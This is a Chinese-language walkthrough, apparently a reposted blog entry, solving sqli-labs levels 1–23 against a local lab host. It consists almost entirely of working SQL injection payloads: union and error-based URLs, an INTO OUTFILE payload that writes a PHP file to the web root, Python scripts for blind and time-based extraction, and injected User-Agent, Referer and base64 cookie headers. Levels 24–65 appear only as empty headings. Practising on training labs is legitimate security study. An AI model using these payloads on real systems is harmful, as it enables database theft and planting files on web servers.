1. 技术文章
  2. sqli-labs通关记录

sqli-labs通关记录

自古美人都是妖i 提交于 2019-12-05 14:55:58

环境搭建:https://www.cnblogs.com/kagari/p/11910749.html

在此基础上添加了一个flag数据库,库名flag,表名flag,字段名flag

Less-1

http://172.16.124.149/Less-1/?id=0%27%20union%20select%201,2,flag%20from%20flag.flag%23

Less-2

http://172.16.124.149/Less-2/?id=0%20union%20select%201,2,flag%20from%20flag.flag

Less-3

http://172.16.124.149/Less-3/?id=0%27)%20union%20select%201,2,flag%20from%20flag.flag%23

Less-4

http://172.16.124.149/Less-4/?id=0%22)%20union%20select%201,2,flag%20from%20flag.flag%23

Less-5

http://172.16.124.149/Less-5/?id=0%27%20union%20select%201,2,count(*)%20from%20mysql.user%20group%20by%20concat((select%20flag%20from%20flag.flag),floor(rand(0)*2))%23

Less-6

http://172.16.124.149/Less-6/?id=0%22%20union%20select%201,2,count(*)%20from%20mysql.user%20group%20by%20concat((select%20flag%20from%20flag.flag),floor(rand(0)*2))%23

Less-7

secure_file_priv=/var/www/html

/var/www/html root:root 755

/var/www/html/tmp root:root 777

http://172.16.124.149/Less-7/?id=1%27))%20union%20select%201,2,%27%3C?php%20phpinfo();%27%20into%20outfile%20%27/var/www/html/tmp/phpinfo.php%27%23

Less-8

import requests
url='http://172.16.124.149/Less-8/?id='
flag=''
for i in range(1,20):
    left=33
    right=128

    while right-left!=1:
        mid=(left+right)/2
        payload="0'^(substr((select+binary+flag+from+flag.flag),{i},1)>binary+{mid})%23".format(i=i,mid=hex(mid))
        r=requests.get(url=url+payload)
        if 'You are in' in r.text:
            left=mid
        else:
            right=mid
    flag+=chr(right)
    print flag

Less-9

import requests
import time
url='http://172.16.124.149/Less-9/?id='
flag=''
for i in range(1,20):
    left=33
    right=128

    while right-left!=1:
        mid=(left+right)/2
        payload="0'^(substr((select+binary+flag+from+flag.flag),{i},1)>binary+{mid}+and+sleep(0.02))%23".format(i=i,mid=hex(mid))
        t1=time.time()
        r=requests.get(url=url+payload)
        t2=time.time()
        if t2-t1 > 0.2:
            left=mid
        else:
            right=mid
    flag+=chr(right)
    print flag

Less-10

import requests
import time
url='http://172.16.124.149/Less-10/?id='
flag=''
for i in range(1,20):
    left=33
    right=128

    while right-left!=1:
        mid=(left+right)/2
        payload='0"^(substr((select+binary+flag+from+flag.flag),{i},1)>binary+{mid}+and+sleep(0.02))%23'.format(i=i,mid=hex(mid))
        t1=time.time()
        r=requests.get(url=url+payload)
        t2=time.time()
        if t2-t1 > 0.2:
            left=mid
        else:
            right=mid
    flag+=chr(right)
    print flag

Less-11

post:

passwd=&uname=' union select 1,(select flag from flag.flag)%23

Less-12

post:

passwd=&uname=") union select 1,(select flag from flag.flag)%23

Less-13

post:

passwd=&uname=') union select%201,count(*)%20from%20mysql.user%20group%20by%20concat((select%20flag%20from%20flag.flag),floor(rand(0)*2))%23

Less-14

post:

passwd=&uname=" union select%201,count(*)%20from%20mysql.user%20group%20by%20concat((select%20flag%20from%20flag.flag),floor(rand(0)*2))%23

Less-15

import requests
import time
url='http://172.16.124.149/Less-15/'
flag=''
for i in range(1,20):
    left=33
    right=128

    while right-left!=1:
        mid=(left+right)/2
        payload="'^(substr((select binary flag from flag.flag),{i},1)>binary {mid} and sleep(0.02))#".format(i=i,mid=hex(mid))
        data={'passwd':'','uname':payload}
        t1=time.time()
        r=requests.post(url=url,data=data)
        t2=time.time()
        if t2-t1 > 0.2:
            left=mid
        else:
            right=mid
    flag+=chr(right)
    print flag

Less-16

import requests
import time
url='http://172.16.124.149/Less-16/'
flag=''
for i in range(1,20):
    left=33
    right=128

    while right-left!=1:
        mid=(left+right)/2
        payload='")^(substr((select binary flag from flag.flag),{i},1)>binary {mid} and sleep(0.02))#'.format(i=i,mid=hex(mid))
        data={'passwd':'','uname':payload}
        t1=time.time()
        r=requests.post(url=url,data=data)
        t2=time.time()
        if t2-t1 > 0.2:
            left=mid
        else:
            right=mid
    flag+=chr(right)
    print flag

Less-17

post:

passwd='^(select count(*) from mysql.user group by concat((select flag from flag.flag),floor(rand(0)*2)))#&uname=Dhakkan

Less-18

POST /Less-18/ HTTP/1.1
Host: 172.16.124.149
Content-Length: 22
Cache-Control: max-age=0
Origin: http://172.16.124.149
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
User-Agent: '^(select count(*) from mysql.user group by concat((select flag from flag.flag),floor(rand(0)*2))),'','')#
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Referer: http://172.16.124.149/Less-18/
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

uname=Dumb&passwd=Dumb

Less-19

POST /Less-19/ HTTP/1.1
Host: 172.16.124.149
Content-Length: 22
Cache-Control: max-age=0
Origin: http://172.16.124.149
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
User-Agent: 
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Referer: '^(select count(*) from mysql.user group by concat((select flag from flag.flag),floor(rand(0)*2))),'')#
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

uname=Dumb&passwd=Dumb

Less-20

GET /Less-20/ HTTP/1.1
Host: 172.16.124.149
Content-Length: 0
Cache-Control: max-age=0
Origin: http://172.16.124.149
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
User-Agent: 
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Referer: 
Cookie: uname='^(select count(*) from mysql.user group by concat((select flag from flag.flag),floor(rand(0)*2)))#
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

Less-21

base64编码:')^(select count(*) from mysql.user group by concat((select flag from flag.flag),floor(rand(0)*2)))#

GET /Less-21/ HTTP/1.1
Host: 172.16.124.149
Content-Length: 0
Cache-Control: max-age=0
Origin: http://172.16.124.149
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
User-Agent: 
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Referer: 
Cookie: uname=JyleKHNlbGVjdCBjb3VudCgqKSBmcm9tIG15c3FsLnVzZXIgZ3JvdXAgYnkgY29uY2F0KChzZWxlY3QgZmxhZyBmcm9tIGZsYWcuZmxhZyksZmxvb3IocmFuZCgwKSoyKSkpIw==
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

Less-22

base64编码:"^(select count(*) from mysql.user group by concat((select flag from flag.flag),floor(rand(0)*2)))#

GET /Less-22/ HTTP/1.1
Host: 172.16.124.149
Content-Length: 0
Cache-Control: max-age=0
Origin: http://172.16.124.149
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
User-Agent: 
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Referer: 
Cookie: uname=Il4oc2VsZWN0IGNvdW50KCopIGZyb20gbXlzcWwudXNlciBncm91cCBieSBjb25jYXQoKHNlbGVjdCBmbGFnIGZyb20gZmxhZy5mbGFnKSxmbG9vcihyYW5kKDApKjIpKSkj==
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

Less-23

http://172.16.124.149/Less-23/?id=0%27%20union%20select%201,2,flag%20from%20flag.flag;%00

Less-24

Less-25

Less-26

Less-27

Less-28

Less-29

Less-30

Less-31

Less-32

Less-33

Less-34

Less-35

Less-36

Less-37

Less-38

Less-39

Less-40

Less-41

Less-42

Less-43

Less-44

Less-45

Less-46

Less-47

Less-48

Less-49

Less-50

Less-51

Less-52

Less-53

Less-54

Less-55

Less-56

Less-57

Less-58

Less-59

Less-60

Less-61

Less-62

Less-63

Less-64

Less-65

标签
select
less
payload
易学教程内所有资源均来自网络或用户发布的内容,如有违反法律规定的内容欢迎反馈
该文章没有解决你所遇到的问题?点击提问,说说你的问题,让更多的人一起探讨吧!